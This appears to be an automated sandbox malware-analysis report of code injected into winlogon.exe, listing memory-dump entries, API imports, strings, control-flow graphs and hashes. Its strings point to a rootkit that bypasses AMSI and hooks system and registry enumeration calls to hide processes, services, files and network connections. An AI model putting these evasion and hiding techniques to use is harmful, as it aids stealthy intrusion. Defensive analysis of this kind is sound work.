                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: 3f2b23ccba4f01efca1837d1ec0e5ebe98186c814f68ab41dbead1d3c470ee30
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: FFD06272ED3708D5F90B6B51E8A4FD43262BF54B09FC50855C50E01264DE2EC659D3D3

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3572789727
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: 16a9fbc9ca01aa2ad8d01d5c7c5c6cd5cef1b3026fde7233e4cf92ec2729da17
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: A7711637A51B5986FB119F65E8A0AD833A5FF84B8DF811111DE4D43B28DE3AC584C392

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: 28d763e4b3efa6897c284255733b152927e4241509441b1b3e99965525c9534b
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 115171B2E91B4EA5FB03DB64E860FD43322BF4074DFC00956A40942565EE7AC25AD3E3

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 75b8f92d8bfc56aebef74cbf69bbb5d49082de77f78bb49cf1e15368de41eb5e
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 91519C72B4170C51FA169B96A800BE57261BF48BB9FC847249E39473D4EF3AD505C783

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 151 1ca7d1e6270-1ca7d1e6297 152 1ca7d1e6299-1ca7d1e62a8 151->152 153 1ca7d1e62ab-1ca7d1e62b6 GetCurrentThreadId 151->153 152->153 154 1ca7d1e62b8-1ca7d1e62bd 153->154 155 1ca7d1e62c2-1ca7d1e62c9 153->155 156 1ca7d1e66ef-1ca7d1e6706 call 1ca7d1e8070 154->156 157 1ca7d1e62db-1ca7d1e62ef 155->157 158 1ca7d1e62cb-1ca7d1e62d6 call 1ca7d1e60a0 155->158 161 1ca7d1e62fe-1ca7d1e6304 157->161 158->156 164 1ca7d1e63d5-1ca7d1e63f6 161->164 165 1ca7d1e630a-1ca7d1e6313 161->165 169 1ca7d1e655f-1ca7d1e6570 call 1ca7d1e7bff 164->169 170 1ca7d1e63fc-1ca7d1e641c GetThreadContext 164->170 167 1ca7d1e6315-1ca7d1e6358 call 1ca7d1f3a40 165->167 168 1ca7d1e635a-1ca7d1e63cd call 1ca7d1e4c50 call 1ca7d1e4bf0 call 1ca7d1e4bb0 165->168 180 1ca7d1e63d0 167->180 168->180 185 1ca7d1e6575-1ca7d1e657b 169->185 173 1ca7d1e6422-1ca7d1e6443 170->173 174 1ca7d1e655a 170->174 173->174 184 1ca7d1e6449-1ca7d1e6452 173->184 174->169 180->161 187 1ca7d1e6454-1ca7d1e6465 184->187 188 1ca7d1e64d2-1ca7d1e64e3 184->188 189 1ca7d1e6581-1ca7d1e65d8 VirtualProtect FlushInstructionCache 185->189 190 1ca7d1e663e-1ca7d1e664e 185->190 196 1ca7d1e6467-1ca7d1e647c 187->196 197 1ca7d1e64cd 187->197 191 1ca7d1e6555 188->191 192 1ca7d1e64e5-1ca7d1e6503 188->192 198 1ca7d1e6609-1ca7d1e6639 call 1ca7d1e7fdc 189->198 199 1ca7d1e65da-1ca7d1e65e4 189->199 194 1ca7d1e6650-1ca7d1e6657 190->194 195 1ca7d1e665e-1ca7d1e666a call 1ca7d1e5530 190->195 192->191 200 1ca7d1e6505-1ca7d1e6550 call 1ca7d1e4040 call 1ca7d1e7c1d 192->200 194->195 202 1ca7d1e6659 call 1ca7d1e4b20 194->202 214 1ca7d1e666f-1ca7d1e6675 195->214 196->197 204 1ca7d1e647e-1ca7d1e64c8 call 1ca7d1e40b0 SetThreadContext 196->204 197->191 198->185 199->198 205 1ca7d1e65e6-1ca7d1e6601 call 1ca7d1e4ad0 199->205 200->191 202->195 204->197 205->198 217 1ca7d1e66b7-1ca7d1e66d5 214->217 218 1ca7d1e6677-1ca7d1e66b5 ResumeThread call 1ca7d1e7fdc 214->218 219 1ca7d1e66e9 217->219 220 1ca7d1e66d7-1ca7d1e66e6 217->220 218->214 219->156 220->219
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
                                            • Instruction ID: d05defe120a4688720ce9ecdd58902b16fb62d512cdd13eabecee864d7326d01
                                            • Opcode Fuzzy Hash: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
                                            • Instruction Fuzzy Hash: 1DD1CC37644B8C82FA71DB0AE49079A77A0F788B89F900512EACD47765DF3DC541CB82

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 226 1ca7d1e5810-1ca7d1e583c 227 1ca7d1e583e-1ca7d1e5846 226->227 228 1ca7d1e584d-1ca7d1e5856 226->228 227->228 229 1ca7d1e5858-1ca7d1e5860 228->229 230 1ca7d1e5867-1ca7d1e5870 228->230 229->230 231 1ca7d1e5872-1ca7d1e587a 230->231 232 1ca7d1e5881-1ca7d1e588a 230->232 231->232 233 1ca7d1e5896-1ca7d1e58a1 GetCurrentThreadId 232->233 234 1ca7d1e588c-1ca7d1e5891 232->234 236 1ca7d1e58a3-1ca7d1e58a8 233->236 237 1ca7d1e58ad-1ca7d1e58b4 233->237 235 1ca7d1e5e13-1ca7d1e5e1a 234->235 236->235 238 1ca7d1e58b6-1ca7d1e58bc 237->238 239 1ca7d1e58c1-1ca7d1e58ca 237->239 238->235 240 1ca7d1e58d6-1ca7d1e58e2 239->240 241 1ca7d1e58cc-1ca7d1e58d1 239->241 242 1ca7d1e58e4-1ca7d1e5909 240->242 243 1ca7d1e590e-1ca7d1e5965 call 1ca7d1e5e20 * 2 240->243 241->235 242->235 248 1ca7d1e5967-1ca7d1e596e 243->248 249 1ca7d1e597a-1ca7d1e5983 243->249 250 1ca7d1e5976 248->250 251 1ca7d1e5970 248->251 252 1ca7d1e5995-1ca7d1e599e 249->252 253 1ca7d1e5985-1ca7d1e5992 249->253 255 1ca7d1e59e6-1ca7d1e59ea 250->255 254 1ca7d1e59f0-1ca7d1e59f6 251->254 256 1ca7d1e59b3-1ca7d1e59d8 call 1ca7d1e7fa0 252->256 257 1ca7d1e59a0-1ca7d1e59b0 252->257 253->252 258 1ca7d1e59f8-1ca7d1e5a14 call 1ca7d1e4ad0 254->258 259 1ca7d1e5a25-1ca7d1e5a2b 254->259 255->254 265 1ca7d1e59de 256->265 266 1ca7d1e5a6d-1ca7d1e5a82 call 1ca7d1e4400 256->266 257->256 258->259 269 1ca7d1e5a16-1ca7d1e5a1e 258->269 263 1ca7d1e5a55-1ca7d1e5a68 259->263 264 1ca7d1e5a2d-1ca7d1e5a4c call 1ca7d1e7fdc 259->264 263->235 264->263 265->255 273 1ca7d1e5a84-1ca7d1e5a8c 266->273 274 1ca7d1e5a91-1ca7d1e5a9a 266->274 269->259 273->255 275 1ca7d1e5aac-1ca7d1e5afa call 1ca7d1f40e0 274->275 276 1ca7d1e5a9c-1ca7d1e5aa9 274->276 279 1ca7d1e5b02-1ca7d1e5b0a 275->279 276->275 280 1ca7d1e5c17-1ca7d1e5c1f 279->280 281 1ca7d1e5b10-1ca7d1e5bfb call 1ca7d1e7b80 279->281 282 1ca7d1e5c63-1ca7d1e5c6b 280->282 283 1ca7d1e5c21-1ca7d1e5c34 call 1ca7d1e4cd0 280->283 293 1ca7d1e5bff-1ca7d1e5c0e call 1ca7d1e47a0 281->293 294 1ca7d1e5bfd 281->294 286 1ca7d1e5c77-1ca7d1e5c86 282->286 287 1ca7d1e5c6d-1ca7d1e5c75 282->287 295 1ca7d1e5c38-1ca7d1e5c61 283->295 296 1ca7d1e5c36 283->296 291 1ca7d1e5c88 286->291 292 1ca7d1e5c8f 286->292 287->286 290 1ca7d1e5c94-1ca7d1e5ca1 287->290 298 1ca7d1e5ca4-1ca7d1e5cf9 call 1ca7d1f3a40 290->298 299 1ca7d1e5ca3 290->299 291->292 292->290 303 1ca7d1e5c12 293->303 304 1ca7d1e5c10 293->304 294->280 295->280 296->282 305 1ca7d1e5d08-1ca7d1e5da1 call 1ca7d1e4c50 call 1ca7d1e4bb0 VirtualProtect 298->305 306 1ca7d1e5cfb-1ca7d1e5d03 298->306 299->298 303->279 304->280 311 1ca7d1e5da3-1ca7d1e5da8 GetLastError 305->311 312 1ca7d1e5db1-1ca7d1e5e11 305->312 311->312 312->235
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
                                            • Instruction ID: c4fb3315ca78ad6c88cc819d43d3822fc1bb5b5b3bb77f142309b4c7efaf3f70
                                            • Opcode Fuzzy Hash: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
                                            • Instruction Fuzzy Hash: A802F933659B8886F761CB15F49079AB7A0F7C4799F500015EA8E87BA8DF7DC484CB42

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: 4b0ed5361dff3adcda6195a5dc2af1083a8005ab2c1b804d84ff7dccd2579ba4
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 72115E37A5574493FB268B61E404A9AB7B0FB44B89F440026DA4D43798EF7EC954C7C3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000003.1732974344.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_3_1ca7d1b0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Virtual$Protect$AllocLibraryLoad
                                            • String ID:
                                            • API String ID: 3316853933-0
                                            • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction ID: fab056db1c559ce614da3632ff79b2cd998d8c65ade00f4a8a9fe06968449f78
                                            • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                            • Instruction Fuzzy Hash: B291F5B3F4139887EB558F29D400FA9B395FF55B98F9481249E4D07B88DA36D822C742

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocQuery
                                            • String ID:
                                            • API String ID: 31662377-0
                                            • Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                            • Instruction ID: 31ae54dde4bc601838691571fe20e4d19e02a82357ab131b83e5d70d6c66b96e
                                            • Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                            • Instruction Fuzzy Hash: BD317533A55B4981FA32CB65F050B8A72A4F78878DF900535E5CD46B94DF3EC1408B83

                                            Control-flow Graph

                                            APIs
                                            • GetModuleFileNameW.KERNEL32 ref: 000001CA7D1E3A35
                                            • PathFindFileNameW.SHLWAPI ref: 000001CA7D1E3A44
                                              • Part of subcall function 000001CA7D1E3F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D1E272F), ref: 000001CA7D1E3FA0
                                              • Part of subcall function 000001CA7D1E3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3EDB
                                              • Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F0E
                                              • Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F2E
                                              • Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F47
                                              • Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F68
                                            • CreateThread.KERNELBASE ref: 000001CA7D1E3A8B
                                              • Part of subcall function 000001CA7D1E1E74: GetCurrentThread.KERNEL32 ref: 000001CA7D1E1E7F
                                              • Part of subcall function 000001CA7D1E1E74: CreateThread.KERNELBASE ref: 000001CA7D1E2043
                                              • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2049
                                              • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2055
                                              • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2061
                                              • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E206D
                                              • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2079
                                              • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2085
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                            • String ID:
                                            • API String ID: 2779030803-0
                                            • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction ID: 5a3ca2a828a2f69e8ddffaa21c5641dcb192bd3c096c6af3b0a23b43865aa00f
                                            • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                            • Instruction Fuzzy Hash: FD116937E9070982FB66A722A549FE932A0BF84B4FFC000199406C11D0EF3BC58587D3

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                            • String ID:
                                            • API String ID: 3733156554-0
                                            • Opcode ID: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
                                            • Instruction ID: d66c06046afa48536f3f5d6c761f082350603e171004f0d7298866914a91c0bf
                                            • Opcode Fuzzy Hash: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
                                            • Instruction Fuzzy Hash: BAF01237658B4880F6319B05E451B8A77A1FB887D9F544111BACD07769CA3AC580CB82

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 000001CA7D1E1724: GetProcessHeap.KERNEL32 ref: 000001CA7D1E172F
                                              • Part of subcall function 000001CA7D1E1724: HeapAlloc.KERNEL32 ref: 000001CA7D1E173E
                                              • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17AE
                                              • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17DB
                                              • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E17F5
                                              • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1815
                                              • Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E1830
                                              • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1850
                                              • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E186B
                                              • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E188B
                                              • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18A6
                                              • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E18C6
                                            • SleepEx.KERNELBASE ref: 000001CA7D1E1BDF
                                              • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18E1
                                              • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1901
                                              • Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E191C
                                              • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E193C
                                              • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1957
                                              • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1977
                                              • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1992
                                              • Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E199C
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CloseOpen$Heap$AllocProcessSleep
                                            • String ID:
                                            • API String ID: 948135145-0
                                            • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction ID: 7242aede8837696ec19541534e1c3dce86efc3bfd9bee90a47d931ad18d557f5
                                            • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                            • Instruction Fuzzy Hash: D5312177A8070941FB529B22E940BE933A5BF44BC9F8A44618E0AC7295EE12C4D093F7

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 410 1ca7d29f370-1ca7d29f39f VirtualProtect
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2769087186.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                            • Associated: 00000008.00000002.2767774337.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2770537977.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2771677805.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2772717324.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2773891736.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d290000_winlogon.jbxd
                                            Similarity
